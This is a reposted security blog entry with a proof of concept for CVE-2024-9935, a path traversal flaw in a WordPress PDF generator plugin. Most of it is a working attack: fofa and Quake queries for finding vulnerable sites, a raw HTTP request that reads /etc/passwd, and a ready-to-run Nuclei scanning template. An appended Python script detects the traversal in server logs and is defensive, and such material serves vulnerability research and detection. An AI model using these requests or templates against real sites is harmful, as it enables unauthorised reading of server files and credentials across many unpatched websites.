CVE-2024-9935 PoC

admin, 5 December 2024 21:18:31
CVE-2024-9935

The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to path traversal in all versions up to and including 1.7.5, via the rtw_pgaepb_dwnld_pdf() function. This allows unauthenticated attackers to read the contents of arbitrary files on the server, which may contain sensitive information.

Vulnerability information

01

Asset discovery

fofa: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
Quake: body:"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"

02

Vulnerability reproduction

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: xxx
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36

03

Nuclei PoC

id: CVE-2024-9935

info:
  name: PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Arbitrary File Download
  author: s4e-io
  severity: high
  description: |
    The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-9935
    - https://plugins.trac.wordpress.org/browser/pdf-generator-addon-for-elementor-page-builder/trunk/public/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/36daf2af-1db3-4b35-8849-480212660b2f?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9935
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-9935
    cwe-id: CWE-22
    epss-score: 0.0009
    epss-percentile: 0.39758
  metadata:
    verified: true
    max-request: 2
    vendor: RedefiningTheWeb
    product: pdf-generator-addon-for-elementor-page-builder
    framework: wordpress
    fofa-query: body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,pdf-generator

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/pdf-generator-addon-for-elementor-page-builder")'
        internal: true

  - raw:
      - |
        GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/pdf")
          - status_code == 200
        condition: and
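As an added example (not part of the original post, the Nuclei template, or the plugin's own code), the following Python scans web server access logs for rtw_pdf_file values that resolve outside the directory the plugin should serve from, catching the double-encoded variant as well. The log lines are constructed, and the /uploads base directory is an assumption.

```python
import re
from posixpath import normpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined format (not real traffic).
# Line 1 reuses the traversal payload from the PoC above, line 2 is a benign
# download, line 3 is a double-encoded variant (..%252f) of the same idea.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Dec/2024:21:18:31 +0800] "GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1432 "-" "Mozilla/5.0 (SS; Linux i686)"
198.51.100.2 - - [05/Dec/2024:21:20:02 +0800] "GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=report-84.pdf HTTP/1.1" 200 20481 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Dec/2024:21:21:45 +0800] "GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%252f..%252fwp-config.php HTTP/1.1" 200 900 "-" "curl/8.4"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Hypothetical base directory the plugin is expected to serve PDFs from (assumption).
PDF_BASE = "/uploads"

def decode_fully(value, max_rounds=3):
    """URL-decode until stable so double-encoded traversal (..%252f) is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(filename):
    """True if the decoded, normalised file name resolves outside PDF_BASE."""
    cleaned = decode_fully(filename).replace("\\", "/")
    resolved = normpath(PDF_BASE + "/" + cleaned)
    return not resolved.startswith(PDF_BASE + "/")

def find_traversal_attempts(log_text):
    """Return (client_ip, status, decoded_file) for each rtw_pdf_file value that escapes."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query)  # parse_qs decodes one layer
        for value in params.get("rtw_pdf_file", []):
            if escapes_base(value):
                hits.append((m["ip"], m["status"], decode_fully(value)))
    return hits
```

A 200 status on a flagged request is the case to escalate, since the PoC's matchers (status 200 plus an application/pdf header wrapping /etc/passwd content) describe a successful read rather than a blocked attempt.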


Originally published on the WeChat public account 混子Hacker: [Vulnerability reproduction] CVE-2024-9935

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. For any issues, contact us by e-mail (preferably a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Reprints must keep this link (CN-SEC 中文网; thanks to the original author for their work): http://cn-sec.com/archives/3468937.html